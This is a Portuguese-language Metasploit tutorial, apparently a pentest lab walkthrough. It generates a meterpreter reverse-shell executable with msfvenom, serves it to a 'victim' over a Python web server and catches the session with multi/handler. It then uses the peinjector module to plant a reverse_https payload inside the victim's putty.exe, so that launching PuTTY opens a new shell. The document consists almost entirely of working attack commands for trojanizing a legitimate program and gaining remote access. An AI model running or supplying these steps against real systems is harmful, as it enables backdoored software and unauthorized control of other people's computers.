O módulo peinjector injeta uma carga útil dentro de um executável do Windows, permitindo que a conexão reversa seja estabelecida assim que a vítima executar um determinado arquivo, neste exemplo utilizaremos o arquivo putty.exe.
Gere o payload shell.exe
Linuxmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.53 LPORT=4444 -f exe > shell.exe
Disponibilize o arquivo shell.exe para o computador da Vítima
Linuxpython3 -m http.server 80
Copie o arquivo shell.exe para o computador da Vítima
Na máquina do Atacante inicie o msfconsole para estabelecer a conexão reversa
Linuxmsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.53 msf6 exploit(multi/handler) > set lport 4444 msf6 exploit(multi/handler) > exploit
Execute o shell.exe
Conexão Reversa estabelecida com sucesso!
Linuxmeterpreter >
Para este exemplo vamos utilizar o putty.exe
Com a conexão reversa já estabelecida, liste os arquivos que estão da pasta Downloads da máquina da Vítima
Linuxmeterpreter > pwd meterpreter > ls
Realize a injeção do payload no executável putty.exe
Linuxmeterpreter > background msf6 exploit(multi/handler) > use post/windows/manage/peinjector msf6 exploit(windows/manage/peinjector) > set lhost 192.168.0.53 msf6 exploit(windows/manage/peinjector) > set lport 443 msf6 exploit(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https msf6 exploit(windows/manage/peinjector) > set targetpe 'C:\Users\100security\Downloads\putty.exe' msf6 exploit(windows/manage/peinjector) > exploit msf6 exploit(windows/manage/peinjector) > exit -y
Inicie o msfconsole novamente e prepare para uma nova conexão reversa
Linuxmsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 192.168.0.53 msf6 exploit(multi/handler) > set lport 443 msf6 exploit(multi/handler) > exploit
Execute o putty.exe
Conexão Reversa estabelecida com sucesso!
Linuxmeterpreter >
Obter as informações do Host
Linuxmeterpreter > sysinfo
Obtendo acesso ao Shell
Linuxmeterpreter > shell